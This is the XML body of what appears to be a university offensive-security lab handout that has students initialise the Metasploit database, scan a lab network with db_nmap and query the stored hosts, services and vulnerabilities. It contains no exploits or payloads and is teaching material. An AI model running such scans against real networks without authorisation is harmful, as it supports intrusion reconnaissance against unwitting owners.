    <w:p w14:paraId="3AB92C21" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ sudo msfdb init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="399EC8C8" wp14:editId="1B897C39">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>258445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6400800" cy="1400810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="114300" distR="114300"/>
            <wp:docPr id="10" name="image6.png" descr="Z:\PSUT\MSc-HTID\3-Labs\Lab6.MSF-CS-Post\h1.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png" descr="Z:\PSUT\MSc-HTID\3-Labs\Lab6.MSF-CS-Post\h1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect t="1165" b="1165"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="1400810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDED2B1" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B45AEF0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now start your msfconsole again and check the status of the database. You should see something similar to the message below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54F08B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="046F48D7" wp14:editId="3C4A0113">
            <wp:extent cx="3665019" cy="53320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3665019" cy="533205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D1004" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187C2553" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now, move on to solving the required tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB099A5" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>Deliverable #5.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>db_nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> to scan the network as the figure shows below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B034D7F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C0D309" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="586CC833" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>Deliverable #5.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the commands such as: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>vulns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check the results that are stored in the database. What does each one of them represent and provide as an output?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604934C0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73799CFD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B887DB0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>Deliverable #5.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> Connect to the database using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>db_connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> command instead of the automatically connected connection you received when you ran msfconsole after starting and initializing the database. Provide proof showing how you did that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4A9271" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE0DA28" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661E19F4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD6955C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part #6 – REFLECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622CBD97" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>Please reflect back on what you learned from this assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69723B85" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00305534">
      <w:headerReference w:type="even" r:id="rId24"/>
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="even" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:headerReference w:type="first" r:id="rId28"/>
      <w:footerReference w:type="first" r:id="rId29"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1152" w:right="1080" w:bottom="1152"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5C822" w14:textId="77777777" w:rsidR="00842A10" w:rsidRDefault="00842A10">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="535694B1" w14:textId="77777777" w:rsidR="00842A10" w:rsidRDefault="00842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395AD" w14:textId="77777777" w:rsidR="00CE46EA" w:rsidRDefault="00CE4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3604A" w14:textId="430F3D7B" w:rsidR="00305534" w:rsidRDefault="00CE46EA">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>@2022</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">                        </w:t>
    </w:r>
    <w:hyperlink r:id="rId1">
      <w:r w:rsidR="00C1364B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>exploitation.ashemery.com</w:t>
      </w:r>
    </w:hyperlink>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t xml:space="preserve">                </w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve">   </w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008A6536">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008A6536">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="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9BF9" w14:textId="77777777" w:rsidR="00CE46EA" w:rsidRDefault="00CE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25BB9" w14:textId="77777777" w:rsidR="00842A10" w:rsidRDefault="00842A10">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="37DBBFB9" w14:textId="77777777" w:rsidR="00842A10" w:rsidRDefault="00842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4EE2D" w14:textId="77777777" w:rsidR="00CE46EA" w:rsidRDefault="00CE46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776B2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:tbl>
    <w:tblPr>
      <w:tblStyle w:val="a"/>
      <w:tblW w:w="10080" w:type="dxa"/>
      <w:tblInd w:w="-115" w:type="dxa"/>
      <w:tblLayout w:type="fixed"/>
      <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="8568"/>
      <w:gridCol w:w="1512"/>
    </w:tblGrid>
    <w:tr w:rsidR="00305534" w14:paraId="7E2BEE61" w14:textId="77777777">
      <w:trPr>
        <w:trHeight w:val="460"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="8568" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="8064A2"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="57018A0B" w14:textId="15E5A4B6" w:rsidR="00305534" w:rsidRDefault="008A6536">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="center" w:pos="4680"/>
              <w:tab w:val="right" w:pos="9360"/>
            </w:tabs>
            <w:ind w:left="216"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
              <w:color w:val="FFFFFF"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
            </w:rPr>
            <w:t xml:space="preserve">OFFENSIVE SECURITY </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
            </w:rPr>
            <w:t xml:space="preserve">&amp; </w:t>
          </w:r>
          <w:r w:rsidR="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
            </w:rPr>
            <w:t>REVERSE ENGINEERING (</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
            </w:rPr>
            <w:t>OSRE</w:t>
          </w:r>
          <w:r w:rsidR="00000000">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:smallCaps/>
            </w:rPr>
            <w:t>)</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1512" w:type="dxa"/>
          <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="711999BD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">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t>2022</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="7664EFDA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">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F645" w14:textId="77777777" w:rsidR="00CE46EA" w:rsidRDefault="00CE4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0684"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3140E896"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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691AE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2252F3C0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>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7FB3149"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0938F2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CE0681B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64A2F7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6554733">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="413283781">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1707752823">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="28253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534"/>
    <w:rsid w:val="00305534"/>
    <w:rsid w:val="00842A10"/>
    <w:rsid w:val="008A6536"/>
    <w:rsid w:val="009A5A00"/>
    <w:rsid w:val="009B112F"/>
    <w:rsid w:val="00BF482F"/>
    <w:rsid w:val="00C1364B"/>
    <w:rsid w:val="00CE46EA"/>
    <w:rsid w:val="00DC5D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C46E"/>
  <w15:docId w15:val="{35D547BE-651C-467B-B8AA-4E7E018A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120" w:after="60"/>
      <w:ind w:left="36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A6536"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
